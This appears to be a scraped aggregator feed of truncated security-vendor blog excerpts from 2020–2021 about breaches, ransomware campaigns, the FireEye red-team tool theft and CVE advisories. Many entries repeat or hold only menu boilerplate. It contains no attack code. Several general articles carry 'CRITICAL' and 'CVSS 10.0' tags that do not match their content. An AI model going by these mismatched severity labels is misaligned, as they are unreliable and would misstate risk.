Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 5th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 5th April, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Personal information of some 553 million Facebook users from 100 countries has been stolen and published online for free in a hacking forum. The records include full name, Facebook ID, phone number, email, location, bio and more.
Iranian APT group Charming Kitten, linked to the government, has launched a new phishing campaign
Trendmicro
Security 101: Virtuelles Patching
blogs_trendmicro·2021-03-22·CVSS 10.0
[CRITICAL] Security 101: Virtuelles Patching
Ausnutzung von Schwachstellen
## Security 101: Virtuelles Patching
Virtuelles Patching — oder Schwachstellen-Shielding — fungiert als Sicherheitsmaßnahme gegen Bedrohungen, die bekannte und unbekannte Schwachstellen ausnutzen.
By: Trend Micro Mar 22, 2021 Read time: ( words)
Save to Folio
Originalartikel von Trend Micro
Die Online-Infrastrukturen von Unternehmen werden immer komplexer – angefangen mit der Dezentralisierung bis zum Einsatz von Technologien für die Cloud , Mobilität und dem Internet-of-Things (IoT). Als Folge davon gestaltet sich auch das Patch Management immer zeitaufwändiger und ressourcenintensiv. Doch das Verzögern oder Verschieben des Aufspielens von Patches birgt ein hohes Risiko. Das zeigen auch die Zahlen für 2019, als 60% der Sicherheitsvorfälle auf nicht eing
Tenable
Healthcare Security: Ransomware Plays a Prominent Role in COVID-19 Era Breaches
blogs_tenable·2021-03-10
Healthcare Security: Ransomware Plays a Prominent Role in COVID-19 Era Breaches
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
blogs_trendmicro·2021-02-23·CVSS 10.0
[CRITICAL] Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
Cyberbedrohungen
## Hindsight is 2020: Looking Back on the Year From a Cybersecurity Perspective
As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cybersecurity report.
By: Trend Micro Research Feb 23, 2021 Read time: ( words)
Save to Folio
2020 was a most unprecedented year given the circumstances under which it unfolded. The Covid-19 pandemic and the other significant events that occurred throughout the year had a lasting impact on the cybersecurity landscape, causing upheavals on many fronts. As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual
Trendmicro
Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
blogs_trendmicro·2021-02-23·CVSS 10.0
[CRITICAL] Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
Ciberamenazas
## Hindsight is 2020: Looking Back on the Year From a Cybersecurity Perspective
As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cybersecurity report.
By: Trend Micro Research Feb 23, 2021 Read time: ( words)
Save to Folio
2020 was a most unprecedented year given the circumstances under which it unfolded. The Covid-19 pandemic and the other significant events that occurred throughout the year had a lasting impact on the cybersecurity landscape, causing upheavals on many fronts. As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cyb
Trendmicro
Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
blogs_trendmicro·2021-02-23·CVSS 10.0
[CRITICAL] Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
Minacce cyber
## Hindsight is 2020: Looking Back on the Year From a Cybersecurity Perspective
As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cybersecurity report.
By: Trend Micro Research Feb 23, 2021 Read time: ( words)
Save to Folio
2020 was a most unprecedented year given the circumstances under which it unfolded. The Covid-19 pandemic and the other significant events that occurred throughout the year had a lasting impact on the cybersecurity landscape, causing upheavals on many fronts. As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cyb
Trendmicro
Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
blogs_trendmicro·2021-02-23·CVSS 10.0
[CRITICAL] Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
Cyber Threats
## Hindsight is 2020: Looking Back on the Year From a Cybersecurity Perspective
As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cybersecurity report.
By: Trend Micro Research 2021/02/23 Read time: ( words)
Save to Folio
2020 was a most unprecedented year given the circumstances under which it unfolded. The Covid-19 pandemic and the other significant events that occurred throughout the year had a lasting impact on the cybersecurity landscape, causing upheavals on many fronts. As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cyber
Trendmicro
Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
blogs_trendmicro·2021-02-23·CVSS 10.0
[CRITICAL] Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
## Hindsight is 2020: Looking Back on the Year From a Cybersecurity Perspective
As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cybersecurity report.
By: Trend Micro Research Feb 23, 2021 Read time: ( words)
Save to Folio
2020 was a most unprecedented year given the circumstances under which it unfolded. The Covid-19 pandemic and the other significant events that occurred throughout the year had a lasting impact on the cybersecurity landscape, causing upheavals on many fronts. As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cybersecurity repo
Trendmicro
Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
blogs_trendmicro·2021-02-23·CVSS 10.0
[CRITICAL] Hindsight is 2020 Looking Back on the Year From a Cybersecurity Perspective
Cyber Threats
# Hindsight is 2020: Looking Back on the Year From a Cybersecurity Perspective
As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cybersecurity report.
By: Trend Micro Research
2021/02/23
Read time: ( words)
Save to Folio
2020 was a most unprecedented year given the circumstances under which it unfolded. The Covid-19 pandemic and the other significant events that occurred throughout the year had a lasting impact on the cybersecurity landscape, causing upheavals on many fronts. As we head deeper into 2021, let’s take a look back on some of the most notable security stories and trends from the past year, all of which are covered in our 2020 annual cyber
Trendmicro
Examining a Sodinokibi Attack
blogs_trendmicro·2021-01-26·CVSS 9.1
[CRITICAL] Examining a Sodinokibi Attack
# Examining A Sodinokibi Attack
Sodinokibi was behind several notable attacks last year. In this entry, we describe its attack process using some of the examples we encountered.
By: Trend Micro Research
2021/01/26
Read time: ( words)
Save to Folio
Sodinokibi was first detected in April 2019 and linked to the retired GandCrab. From that point on, Sodinokibi launched several high-profile attacks that continued throughout 2020, thus making a name for itself as one of the ransomware families that should be watched out for. Here we describe Sodinokibi’s typical attack process.
Technical analysis
The threat actors behind Sodinokibi typically hire a variety of affiliates for their initial access. Their attacks often begin with familiar techniques like malspam emails with spear-phishing lin
Tenable
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
blogs_tenable·2021-01-21
Daisy Chaining: How Vulnerabilities Can Be Greater Than the Sum of Their Parts
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Unit42
Threat Brief: FireEye Red Team Tool Breach
blogs_unit42·2020-12-11
Threat Brief: FireEye Red Team Tool Breach
Threat Research Center
High Profile Threats
Vulnerabilities
## Threat Brief: FireEye Red Team Tool Breach
Unit 42
Published: December 10, 2020
High Profile Threats
Malware
Vulnerabilities
FireEye breach
## Executive Summary
On Dec. 8, 2020, one of the leading cybersecurity companies in the industry, FireEye, reported a breach and data exfiltration unlike any that we have seen previously. What makes this attack unique is not only the target, FireEye being a well-known cybersecurity company, but that the stolen data contains the internal, custom-crafted red-team and penetration testing tools used by the company to imitate different threat actors during customer security consultations. FireEye’s blog provided a wealth of information for defenders to implement security controls
Unit42
Threat Brief: FireEye Red Team Tool Breach
blogs_unit42·2020-12-11
Threat Brief: FireEye Red Team Tool Breach
## Executive Summary
On Dec. 8, 2020, one of the leading cybersecurity companies in the industry, FireEye, reported a breach and data exfiltration unlike any that we have seen previously. What makes this attack unique is not only the target, FireEye being a well-known cybersecurity company, but that the stolen data contains the internal, custom-crafted red-team and penetration testing tools used by the company to imitate different threat actors during customer security consultations. FireEye’s blog provided a wealth of information for defenders to implement security controls and mitigations for defense against the stolen tools. This data is being used by Palo Alto Networks to help ensure our customers are protected if the attackers choose to utilize the tools for malicious purposes.
It i
Fortinet
FireEye Red Team Tool Breach | Fortinet
blogs_fortinet·2020-12-11·CVSS 8.8
[HIGH] FireEye Red Team Tool Breach | Fortinet
PSIRT BLOGS
FireEye Red Team Tool Breach
By Carl Windsor | December 11, 2020
Executive Summary
On December 8th cyber security vendor FireEye reported a breach of their network and data exfiltration which included their internally developed Red Team tools. FireEye took the step of publishing details of these tools in a GitHub repository to allow other vendors to protect against their use by potential adversaries.
This breach has been attributed to a nation state threat actor so we do not expect to see these tools be widely abused in the wild, however with the additional information provided by FireEye, Fortinet have been able to ensure that these tools cannot be abused.
Threat Mitigation
None of the vulnerabilities disclosed as targeted in the tools were zero days, therefore FortiGuard
Qualys
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
blogs_qualys·2020-12-10
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach
Update Jan 5, 2021 : New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.
Update Dec 23, 2020 : Added a new section on compensating controls.
Update Dec 22, 2020: FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.
Using Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):
Active Attacks
Solorigate Sunburst ( New RTI )
Original post : On December 8, 2020, FireEye disclosed theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the securit
Qualys
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach | Qualys
blogs_qualys·2020-12-10
Solorigate/Sunburst : Theft of Cybersecurity Tools | FireEye Breach | Qualys
Update Jan 5, 2021: New patching section with two new dashboard widgets showing the number of missing FireEye-related patches in your environment and the number of assets in your environment missing one of those patches.
Update Dec 23, 2020: Added a new section on compensating controls.
Update Dec 22, 2020: FireEye disclosed the theft of their Red Team assessment tools. Hackers now have an influential collection of new techniques to draw upon.
Using Qualys VMDR, the vulnerabilities for Solorigate/SUNBURST can be prioritized for the following Real-Time Threat Indicators (RTIs):
- Active Attacks
- Solorigate Sunburst (New RTI)
Original post: On December 8, 2020, FireEye disclosed theft of their Red Team assessment tools. These tools are used by FireEye to test and validate the security
Checkpoint
26th October – Threat Intelligence Bulletin
blogs_checkpoint·2020-10-26
CVE-2020-3118 26th October – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 26th October – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 26th October 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Voter database in Hall Country, Georgia, used to verify voter signatures, has been breached by ransomware, alongside other government systems. This might be the first official election resource to be hit by ransomware. The ‘DoppelPaymer’ gang has claimed responsibility for the attack.
US officials warn against a R
Tenable
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
blogs_tenable·2020-10-23
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities | Qualys
blogs_qualys·2020-10-22·CVSS 9.8
CVE-2020-15505 [CRITICAL] NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities | Qualys
#### Table of Contents
- Detect 25 Publicly Known Vulnerabilities using VMDR
Update November 25, 2020: The UK National Cyber Security Centre alerts that APT nation-state groups and cybercriminals are exploiting MobileIron RCE vulnerability (CVE-2020-15505).
Original post: On October 20, 2020, the United States National Security Agency (NSA) released a cybersecurity advisory on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.
“Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and
mitigation efforts,” said the NSA advisory. It also recommended “crit
Qualys
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities
blogs_qualys·2020-10-22·CVSS 10.0
CVE-2020-15505 [CRITICAL] NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities
## Table of Contents
Detect 25 Publicly Known Vulnerabilities using VMDR
Update November 25, 2020 : The UK National Cyber Security Centre alerts that APT nation-state groups and cybercriminals are exploiting MobileIron RCE vulnerability (CVE-2020-15505).
Original post : On October 20, 2020, the United States National Security Agency (NSA) released a cybersecurity advisory on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.
“Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and mitigation efforts,” said the NSA advisory. It also recommended “critic
Tenable
CVE-2020-5135: Critical SonicWall VPN Portal Stack-based Buffer Overflow Vulnerability
blogs_tenable·2020-10-15·CVSS 9.8
[CRITICAL] CVE-2020-5135: Critical SonicWall VPN Portal Stack-based Buffer Overflow Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2020-1472: Advanced Persistent Threat Actors Use Zerologon Vulnerability In Exploit Chain with Unpatched Vulnerabilities
blogs_tenable·2020-10-12·CVSS 5.5
[MEDIUM] CVE-2020-1472: Advanced Persistent Threat Actors Use Zerologon Vulnerability In Exploit Chain with Unpatched Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
US Cybersecurity Agency CISA Alert: Foreign Threat Actors Continue to Target Unpatched Vulnerabilities
blogs_tenable·2020-09-17
US Cybersecurity Agency CISA Alert: Foreign Threat Actors Continue to Target Unpatched Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Sentinelone
Threat Intel | Cyber Attacks Leveraging the COVID-19/CoronaVirus Pandemic
blogs_sentinelone·2020-09-04
Threat Intel | Cyber Attacks Leveraging the COVID-19/CoronaVirus Pandemic
## Threat Intel | Cyber Attacks Leveraging the COVID-19/CoronaVirus Pandemic
At Sentinel Labs, we have been closely tracking adversarial behavior as it pertains to COVID-19/Coronavirus. To date, we have observed a significant number of malware campaigns, spam campaigns, and outright scams that are preying on the fears and uncertainties of the global population.
Updates are tagged in-line with respective dates within each section of this post.
## September 2020
[September 9, 2020]
On August 27, the Health Sector Cybersecurity Coordination Center (HC3) released report ID: 202008271653 . This report details a specific phishing campaign used to distribute the Agent Tesla RAT . The lure in the emails is centered around updates to COVID-specific PPE (Personal Protection Equipment). We have
Sentinelone
Threat Intel | Cyber Attacks Leveraging the COVID-19/CoronaVirus Pandemic - SentinelLabs
blogs_sentinelone·2020-09-04
Threat Intel | Cyber Attacks Leveraging the COVID-19/CoronaVirus Pandemic - SentinelLabs
At Sentinel Labs, we have been closely tracking adversarial behavior as it pertains to COVID-19/Coronavirus. To date, we have observed a significant number of malware campaigns, spam campaigns, and outright scams that are preying on the fears and uncertainties of the global population.
Updates are tagged in-line with respective dates within each section of this post.
## September 2020
[September 9, 2020]
On August 27, the Health Sector Cybersecurity Coordination Center (HC3) released report ID: 202008271653. This report details a specific phishing campaign used to distribute the Agent Tesla RAT. The lure in the emails is centered around updates to COVID-specific PPE (Personal Protection Equipment). We have seen similar campaigns running since late April / early May, and these current e
Unit42
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
blogs_unit42·2020-08-26
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
Threat Research Center
Threat Research
Vulnerabilities
## The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
Jay Chen
Published: August 26, 2020
Threat Research
Vulnerabilities
Exploit
## Executive Summary
With the ever-increasing number of new vulnerabilities, vulnerability management becomes one of the most critical processes in ensuring continuous business operation. While it is clear that timely patching is essential, it’s also important to know quantitatively how a delay could increase risk. What is the chance that attackers breach my organization using a CVE just disclosed or using an unknown (zero-day) vulnerability? To understand the state of vulnerability disclosure and exploit development, Unit 42 researchers analyzed 45,450 publicly availabl
Unit42
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
blogs_unit42·2020-08-26
The State of Exploit Development: 80% of Exploits Publish Faster than CVEs
## Executive Summary
With the ever-increasing number of new vulnerabilities, vulnerability management becomes one of the most critical processes in ensuring continuous business operation. While it is clear that timely patching is essential, it’s also important to know quantitatively how a delay could increase risk. What is the chance that attackers breach my organization using a CVE just disclosed or using an unknown (zero-day) vulnerability? To understand the state of vulnerability disclosure and exploit development, Unit 42 researchers analyzed 45,450 publicly available exploits in Exploit Database at the time of this writing. The research correlated the exploit data with vulnerability and patch information to study exploit development in multiple facets.
The research reveals that:
-
Securelist
Incident Response Analyst Report of 2019
blogs_securelist·2020-08-06
Incident Response Analyst Report of 2019
Table of Contents
- Executive summary
- Recommendations
- Reasons for incident response
- Distribution of reasons for top regions
- Distribution of reasons for industries
- Initial vectors or how adversaries get in
- Tools and exploits
- Attack duration
- Operational metrics
- How fast we responded
- How long response took
- MITRE ATT&CK tactics and techniques
- Conclusion
Authors
- Ayman Shaaban
- Grigory Sablin
- Kaspersky GERT
Download full report (PDF)
As an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries’ cyber-incident tactics and techniques used in the wild. In this report, we share our teams’ conclusions and analysis based on incident responses and statistics from 2019. As well as a range of highlights,
Securelist
Incident Response Analyst Report 2019
blogs_securelist·2020-08-06
Incident Response Analyst Report 2019
Table of Contents
Executive summary
Verticals and industries
Recommendations
Reasons for incident response
Distribution of reasons for top regions
Distribution of reasons for industries
Initial vectors or how adversaries get in
Tools and exploits
30% of all incidents were tied to legitimate tools
Exploits
Attack duration
Operational metrics
False positives rate
Age of attack
How fast we responded
How long response took
MITRE ATT&CK tactics and techniques
Conclusion
Authors
Ayman Shaaban
Grigory Sablin
Kaspersky GERT
Download full report (PDF)
As an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries’ cyber-incident tactics and techniques used in the wild. In this report, we share our teams’ conclus
Tenable
CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
blogs_tenable·2020-06-29·CVSS 10.0
[CRITICAL] CVE-2020-2021: Palo Alto Networks PAN-OS Vulnerable to Critical Authentication Bypass Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
Quarterly report: Incident Response trends in Summer 2020
blogs_talos·2020-06-15
Quarterly report: Incident Response trends in Summer 2020
By David Liebenberg and Caitlin Huey.
For the fourth quarter in a row, Ryuk dominated the threat landscape in incident response. As we mentioned in last quarter’s report, Ryuk has shifted from relying on commodity trojans to using living-off-the-land tools. This has led to a decrease in observations of attacks leveraging commodity trojans. Email remained the top infection vector, though we observe increased compromises of remote desktop services (RDS) as well as Citrix devices and Pulse VPN. One of the more interesting trends this quarter was the role of the COVID-19 pandemic. Interestingly, we did not observe any engagements in which COVID-19 was used in an attack. However, CTIR has observed the pandemic impacting organizations, affecting their ability to respond and contain cybersecurit
Unit42
Threat Brief: Maze Ransomware
blogs_unit42·2020-05-08·CVSS 7.8
[HIGH] Threat Brief: Maze Ransomware
## Executive Summary
Since the beginning of the calendar year, Palo Alto Networks has detected an uptick in Maze ransomware samples across multiple industries. As a result, we've created this general threat assessment post on the Maze ransomware activities and full visualization of these techniques can be viewed in the Unit 42 Playbook Viewer.
Maze ransomware, a variant of ChaCha ransomware, was first observed in May 2019 and has targeted organizations in North America, South America, Europe, Asia, and Australia. This ransomware is typically distributed via emails containing weaponized Word or Excel attachments. However, it has also been distributed via exploit kits such as the Spelevo Exploit Kit, which has been used with Flash Player vulnerabilities CVE-2018-15982 and CVE-2018-4878. Ma
Unit42
Threat Brief: Maze Ransomware
blogs_unit42·2020-05-08·CVSS 7.8
[HIGH] Threat Brief: Maze Ransomware
Threat Research Center
High Profile Threats
Ransomware
## Threat Brief: Maze Ransomware
Brittany Barbehenn
Doel Santos
Published: May 8, 2020
High Profile Threats
Ransomware
Maze
SpelevoEK
## Executive Summary
Since the beginning of the calendar year, Palo Alto Networks has detected an uptick in Maze ransomware samples across multiple industries. As a result, we've created this general threat assessment post on the Maze ransomware activities and full visualization of these techniques can be viewed in the Unit 42 Playbook Viewer .
Maze ransomware, a variant of ChaCha ransomware, was first observed in May 2019 and has targeted organizations in North America, South America, Europe, Asia, and Australia. This ransomware is typically distributed via emails containing weaponized
Checkpoint
27th April – Threat Intelligence Bulletin
blogs_checkpoint·2020-04-27·CVSS 10.0
CVE-2019-11510 [CRITICAL] 27th April – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 27th April – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 27th April 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point has investigated a Business Email Compromise attack targeting a financial organization and their business partner. The attacking group, the Florentine Banker, manipulated four transactions of over 1 million GBP into their own bank accounts using advanced phishing tactics to target the mail accounts of key i
Tenable
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
blogs_tenable·2020-04-13
Critical Vulnerabilities You Need to Find and Fix to Protect the Remote Workforce
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Management (CSPM)
Compliance
Cyber insurance
Data Security Posture Management (DSPM)
Google Cloud security
Infrastructure as Code (IaC) security
Kubernetes Security Pos
Tenable
How COVID-19 Response Is Expanding the Cyberattack Surface
blogs_tenable·2020-03-30
How COVID-19 Response Is Expanding the Cyberattack Surface
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
17th February – Threat Intelligence Bulletin
blogs_checkpoint·2020-02-17·CVSS 10.0
CVE-2019-11510 [CRITICAL] 17th February – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 17th February – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 17th February 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Terrorist organization Hamas has targeted Israeli soldiers using a catfishing attack. Check Point researchers have detailed how the attack took place, in a manner similar to ones used in the past by previous APT-C-23 Hamas operatives have disguised themselves as attractive single women who convinced the soldiers
Checkpoint
13th January – Threat Intelligence Bulletin
blogs_checkpoint·2020-01-13·CVSS 7.8
CVE-2019-2215 [HIGH] 13th January – Threat Intelligence Bulletin
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 13th January – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 13th January 2020, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Austria’s foreign ministry has suffered a serious cyber-attack, allegedly conducted by a foreign state.
US government-funded low-cost UMX mobile phones include preinstalled “unremovable” malware. The malware, a variant of HiddenAds, is suspected to be of Chinese origin, as is the UMX phone itself.
Three malicious
Tenable
CVE-2019-11510: Critical Pulse Connect Secure Vulnerability Used in Sodinokibi Ransomware Attacks
blogs_tenable·2020-01-07·CVSS 10.0
[CRITICAL] CVE-2019-11510: Critical Pulse Connect Secure Vulnerability Used in Sodinokibi Ransomware Attacks
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Volexity
